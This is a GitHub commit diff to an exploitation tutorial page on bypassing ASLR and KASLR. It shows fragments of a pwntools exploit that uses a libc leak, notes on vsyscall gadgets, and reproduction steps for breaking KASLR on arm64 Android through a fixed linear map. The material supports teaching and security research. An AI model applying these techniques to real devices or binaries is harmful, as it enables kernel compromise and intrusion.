You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
@@ -181,6 +186,9 @@ Therefore, if the attacker is in the same computer as the binary being exploited
181
186
182
187
If you are given a leak (easy CTF challenges), you can calculate offsets from it (supposing for example that you know the exact libc version that is used in the system you are exploiting). This example exploit is extract from the [**example from here**](https://ir0nstone.gitbook.io/notes/types/stack/aslr/aslr-bypass-with-given-leak) (check that page for more details):
183
188
189
+
<details>
190
+
<summary>Python exploit with given libc leak</summary>
191
+
184
192
```python
185
193
from pwn import*
186
194
@@ -206,6 +214,8 @@ p.sendline(payload)
206
214
p.interactive()
207
215
```
208
216
217
+
</details>
218
+
209
219
-**ret2plt**
210
220
211
221
Abusing a buffer overflow it would be possible to exploit a **ret2plt** to exfiltrate an address of a function from the libc. Check:
@@ -255,14 +265,17 @@ However, no super interesting gadgets will be find here (although for example it
255
265
256
266
For instance, an attacker might use the address `0xffffffffff600800` within an exploit. While attempting to jump directly to a `ret` instruction might lead to instability or crashes after executing a couple of gadgets, jumping to the start of a `syscall` provided by the **vsyscall** section can prove successful. By carefully placing a **ROP** gadget that leads execution to this **vsyscall** address, an attacker can achieve code execution without needing to bypass **ASLR** for this part of the exploit.
257
267
258
-
```
268
+
<details>
269
+
<summary>Example vmmap/vsyscall and gadget lookup</summary>
Note therefore how it might be possible to **bypass ASLR abusing the vdso** if the kernel is compiled with CONFIG_COMPAT_VDSO as the vdso address won't be randomized. For more info check:
@@ -305,6 +320,40 @@ Note therefore how it might be possible to **bypass ASLR abusing the vdso** if t
### KASLR on ARM64 (Android): bypass via fixed linear map
309
324
325
+
On many arm64 Android kernels the kernel linear map (direct map) base is fixed across boots. Kernel VAs for physical pages become predictable, breaking KASLR for targets reachable via the direct map.
310
326
327
+
- For CONFIG_ARM64_VA_BITS=39 (4 KiB pages, 3-level paging):
- No separate KASLR leak needed if the target is in/reachable via the direct map (e.g., page tables, kernel objects on physical pages you can influence/observe).
339
+
- Simplifies reliable arbitrary R/W and targeting of kernel data on arm64 Android.
340
+
341
+
**Reproduction summary**
342
+
1)`grep memstart /proc/kallsyms` -> address of `memstart_addr`
343
+
2) Kernel read -> decode 8 bytes LE -> `PHYS_OFFSET`
344
+
3) Use `virt = ((phys - PHYS_OFFSET) | PAGE_OFFSET)` with `PAGE_OFFSET=0xffffff8000000000`
345
+
346
+
> [!NOTE]
347
+
> Access to tracing-BPF helpers requires sufficient privileges; any kernel read primitive or info leak suffices to obtain `PHYS_OFFSET`.
348
+
349
+
**How it’s fixed**
350
+
- Limited kernel VA space plus CONFIG_MEMORY_HOTPLUG reserves VA for future hotplug, pushing the linear map to the lowest VA (fixed base).
0 commit comments